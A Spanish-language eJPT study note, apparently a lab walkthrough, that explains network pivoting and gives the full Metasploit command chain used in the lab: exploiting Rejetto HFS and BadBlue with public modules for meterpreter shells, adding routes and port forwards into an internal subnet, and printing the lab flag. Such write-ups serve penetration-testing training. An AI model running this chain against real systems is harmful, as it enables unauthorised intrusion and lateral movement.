> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/postexplotacion-en-windows/pivoting.md).

# Pivoting

## 🧠 ¿Qué es el Pivoting?

**Pivoting** es una técnica de post-explotación avanzada que permite a un atacante utilizar un host comprometido como **puente hacia otros sistemas** que residen en una red interna privada, inaccesible directamente desde el exterior. Es una de las habilidades más poderosas en la cadena de ataque, ya que abre la puerta a nuevas superficies de ataque dentro de la infraestructura comprometida.

***

## 🏃‍♂️ ¿Cómo funciona?

Supón que has comprometido una máquina en la red perimetral (DMZ). A través de esta máquina, puedes ahora "pivotar" hacia la red interna, donde residen servidores críticos, estaciones de trabajo u otros recursos sensibles.

Este proceso permite:

* Explorar subredes internas no visibles desde el exterior.
* Lanzar exploits contra otros sistemas desde la máquina pivote.
* Mantener el acceso sin exponer directamente tu dirección IP al sistema objetivo.

***

## 🗺️ Ejemplo

<figure><img src="/files/BM6fUn1dMc3X0iUk19hO" alt=""><figcaption></figcaption></figure>

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/SpaLorUO1ZRrmnHucAov" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo1.ine.local
```

<figure><img src="/files/iOLrqprxqBool6yMChw9" alt=""><figcaption></figcaption></figure>

Los objetivos son alcanzables.

**Paso 3:** Escaneo de puertos con Nmap

Para empezar, necesitaremos identificar un servicio vulnerable que se esté ejecutando en el primer sistema de destino, esto se puede hacer realizando un escaneo de detección de versión de servicio con Nmap.

**Dominio:**

```
nmap demo1.ine.local
```

<figure><img src="/files/Q2EbzlW549KjegujaQvp" alt=""><figcaption></figcaption></figure>

Hemos descubierto que varios puertos están abiertos. Volveremos a ejecutar nmap para determinar la versión del puerto 80.

**Dominio:**

```
nmap -sV -p80 demo1.ine.local
```

<figure><img src="/files/ihmAqsxGdkfSwuTI9Tl6" alt=""><figcaption></figcaption></figure>

**Paso 4:** Búsqueda de exploits con Searchsploit

**Dominio:**

```
searchsploit hfs
```

Como se muestra en la siguiente captura de pantalla, Searchsploit revela que hay un módulo de explotación de Metasploit Framework que se puede utilizar para explotar esta versión específica del **servidor de archivos HTTP Rejetto** .

<figure><img src="/files/EIFEnR49TiVywZsDVZhq" alt=""><figcaption></figcaption></figure>

**Paso 5:** Obtener acceso

Para utilizar este módulo de exploit, necesitaremos iniciar la Consola Metasploit Framework (msfconsole), esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

Después de iniciar **msfconsole** , podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/windows/http/rejetto_hfs_exec
```

Ahora tendremos que configurar las opciones del módulo; más específicamente, establecer la dirección de destino. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo1.ine.local
```

Después de configurar las opciones del módulo, podemos ejecutar el módulo de exploit ejecutando el siguiente comando:

**Dominio:**

```
exploit
```

Como se muestra en la siguiente captura de pantalla, el módulo de explotación se ejecuta con éxito y nos proporciona una sesión **de meterpreter** en el sistema de destino.

<figure><img src="/files/drRRYFXECCJyUWl6RoAC" alt=""><figcaption></figcaption></figure>

Hemos explotado con éxito la aplicación vulnerable objetivo (hfs) y hemos obtenido un shell de meterpreter. Verifique la dirección IP del equipo objetivo.

**Dominio:**

```
ipconfig
```

<figure><img src="/files/YwjYDaSgb2fP5ztd0qxK" alt=""><figcaption></figcaption></figure>

Podemos observar que solo hay un adaptador de red y tenemos dos direcciones IP de máquina.

Pero no podemos acceder a “Victim Machine 2” directamente desde la máquina del atacante.

Agregaremos una ruta y luego ejecutaremos un módulo de escáner de puerto auxiliar en la segunda máquina víctima para descubrir un host y abrir puertos.

**Dominio:**

```
run autoroute -s 10.0.16.0/20
```

<figure><img src="/files/EgOHSkbOi4sgBgJn2rTe" alt=""><figcaption></figcaption></figure>

Ejecutando el escáner de puertos en la segunda máquina.

**Dominio:**

```
background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit
```

<figure><img src="/files/ror8I8BwBtUUzgb1gIRA" alt=""><figcaption></figcaption></figure>

Hemos descubierto el puerto 80 en la máquina Pivot. Ahora, redireccionaremos el puerto remoto 80 al puerto local 1234 y capturaremos el banner con Nmap.

**Dominio:**

```
sessions -i 1
portfwd add -l 1234 -p 80 -r demo2.ine.local
portfwd list
```

<figure><img src="/files/UJOZGvLyGlGrrSRr6OeH" alt=""><figcaption></figcaption></figure>

Hemos reenviado el puerto, ahora usamos Nmap para encontrar el nombre y la versión de la aplicación en ejecución.

**Nota:** No cierre msfconsole.

**Dominio:**

```
nmap -sV -sS -p 1234 localhost
```

<figure><img src="/files/VJADzNgvHDHVSPntDMy5" alt=""><figcaption></figcaption></figure>

Buscaremos el módulo de explotación de badblue 2.7 usando searchsploit.

**Dominio:**

```
searchsploit badblue 2.7
```

<figure><img src="/files/HM9kuXVnM517xr63KfSE" alt=""><figcaption></figcaption></figure>

Existe un módulo de Metasploit para el servidor BadBlue. Usaremos el módulo de Metasploit PassThu para el desbordamiento de búfer remoto y así explotar el objetivo.

**Comandos:**

```
use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS demo2.ine.local
exploit
```

<figure><img src="/files/YRoD9Kz5kDn8a2IHVced" alt=""><figcaption></figcaption></figure>

Hemos explotado con éxito la aplicación vulnerable objetivo (badblue) y recibimos un shell meterpreter.

**Paso 6:** Buscando la bandera.

**Dominio:**

```
shell
cd /
dir
type flag.txt
```

<figure><img src="/files/D2GTdRHUVDNtXpgpA81c" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

**Bandera:** c46d12f28d87ae0b92b05ebd9fb8e817

#### Conclusión

Este laboratorio guía con éxito a través de la toma de huellas dactilares y la explotación de aplicaciones vulnerables, para luego pasar a una segunda máquina de destino y mantener el acceso mediante explotación adicional.

* [Módulos de Metasploit I](https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)
* [Módulos de Metasploit II](https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec)
